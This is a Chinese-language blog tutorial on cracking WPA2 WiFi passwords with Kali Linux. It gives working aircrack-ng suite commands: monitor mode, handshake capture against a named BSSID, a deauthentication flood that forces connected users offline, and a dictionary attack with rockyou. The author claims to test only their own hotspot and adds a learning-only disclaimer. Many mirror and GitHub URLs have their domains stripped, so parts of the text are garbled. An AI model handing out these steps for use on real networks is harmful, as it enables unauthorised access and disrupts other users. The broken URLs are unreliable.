Kali 下wpa2安全 下的WiFi密码解

这段时间沉迷与黑客技术无法自拔，当一名炫酷的黑客是每个男孩儿时的梦想，但是这条路也是艰辛的，孤独的，就看你有没有那个恒心一直走下去。现在网络很发达有很多的学习资源，能够很好的帮助我们学习一样东西，也记得以前有位大神说过（哈哈名字就不说了），学it Google，百度 就是最好的老师。闲话不多说了下面笔者分享一下自己进行WiFi渗透的一个实例，既能帮助感兴趣的伙伴学习，也能使笔者后面更好的回顾。

在正式开始之前。我们先要准备相关的环境我这里用的是：

VMware Workstation Pro

kali-linux-.2-amd64.iso

重点：！！！！ 需要一张无限网卡

首先安装好kali （本文的重点是讲如何进行WiFi密码的破解 所以怎么安装系统就简单介绍 网上也有教程）

到此默认读者已经安装好了kali 有一点了解的同学都知道kali就是一个为渗透而生的Linux的发型版，她自带了300多个渗透工具，为什么叫她呢 因为kali在印度音译为迦梨,(KALI,卡莉女神,卡利女神)是印度教中的一个女神，字面意思是“黑色的” 是印度很神秘的一派，好不扯远了。

安装好kali 那么要首先要进行的便是更新了，系统的更新，包的更新。

在linux里面更新 那么就涉及到一个更新源的问题，kali官方的源因为国内网络的一些原因并不能正常的更新 那我们就需要修改一下她的更新源。

kali 的更新源在路径/etc/apt / sources.list中

我们使用命令：

$vim /etc/apt / sources.list

添加完成后我们按esc键 后 ‘：wq’保存退出

在输入命令

#apt-get update 首先要执行这条命令 它是根据我们的更新源而列出索引供下面这条命令更新最新的包

# apt-get upgrade 更新软件包

国内比较好用的更新源笔者在下面列出来了：

#中科大deb http://mirrors./kali kali-rolling main non-free contribdeb-src http://mirrors./kali kali-rolling main non-free contrib#阿里云deb /kali kali-rolling main non-free contribdeb-src /kali kali-rolling main non-free contrib#清华大学deb http://mirrors.tuna./kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna./kali kali-rolling main contrib non-free#浙大deb http://mirrors./kali kali-rolling main contrib non-freedeb-src http://mirrors./kali kali-rolling main contrib non-free#东软大学deb http://mirrors./kali kali-rolling/main non-free contribdeb-src http://mirrors./kali kali-rolling/main non-free contrib#官方源deb /kali kali-rolling main non-free contribdeb-src /kali kali-rolling main non-free contrib

好在执行完上面两个命令后环境也基本安装好了，噢 还有就是在kaili上下载东西不免很多我们都是在GitHub上下载，或者挂载，那样会有些慢 又不想花钱挂vpn的小伙伴可以参考一下笔者下面的方法，可以很明显的提高下载速度：

额。。。思路就是：：git clone 特别慢是因为github.global.域名被限制了。只要找到这个域名对应的ip地址，然后在hosts文件中加上ip–>域名的映射，刷新DNS缓存就可以了

首先用下面方法查看域名，与IP

例如：http://github./#ipinfo 查看的IP 与域名

http://github.global../#ipinfo 查看github.global.的IP 与域名

将查找的域名，与IP 附加在路径为/etc/hosts的文件中：

保存并退出

修改完hosts还不会立即生效，你需要刷新DNS缓存，告诉电脑我的hosts文件已经修改了。

输入指令：sudo /etc/init.d/networking restart 即可。

插入无线网卡：

点击虚拟机选卡，选择可移动设备 在里面找到你的网卡设备 ，点击连接就行

买网卡尽量买免驱网卡 因为会省去安装驱动的麻烦

好万事俱备只欠东风了，下面就是本为的重点了：

第一步：

$ iwconfig 查看网络设备

出现黄色框内的内容及说明网卡被正常识别了

第二步：

为了避免后面不出错输入以下命令：

# service network-manager stop

# airmon-ng check kill

第三步：

# airmon-ng start wlan0 将网卡调为混杂模式

# iwconfig 检验是否成功

这样便设置成功

第四步：

# airodump-ng wlan0mon 扫描附近热点

本次笔者以自己手机开的热点作为测试

记住 测试热点的bssid CH 信道数

第五步：

开始进行捕捉握手包：

命令# airodump-ng wlan0mon –bssid 4E:49:E3:64:5C:DF -c 9 -w wpa2

出现红框即表示捕获握手包成功

如果很长时间没有出现的伙伴 在新打开一个终端窗口输入命令

# aireplay-ng -0 0 -a 4E:49:E3:64:5C:DF wlan0mon洪水攻击冲垮连接热点的用户 强行使他们重新连接而得到握手包

第五步：

# ls wpa*

后面使用Kali Linux中默认存在的字典，进入目录为/usr/share/wordlists/rockyou.txt.zip，其中需要使用命令来解压：

再回到最先握手包的路径 执行命令：

# aircrack-ng -w/usr/share/wordlists/rockyou.txt wpa2-01.cap

这样便以经得出了密码 这个方法也只能破解比较简单的密码，例如纯数字 或者 纯字母 还有就字母与数字组合的密码 有特殊符号的那么破解就比较困难了，但你的字典足够强大那么就可以破解。

好了本文也到此结束了，本为只做教程教学，学习为主，警醒大家网络的安全意识，并不是教你干坏事。

未经作者同意 严禁转载。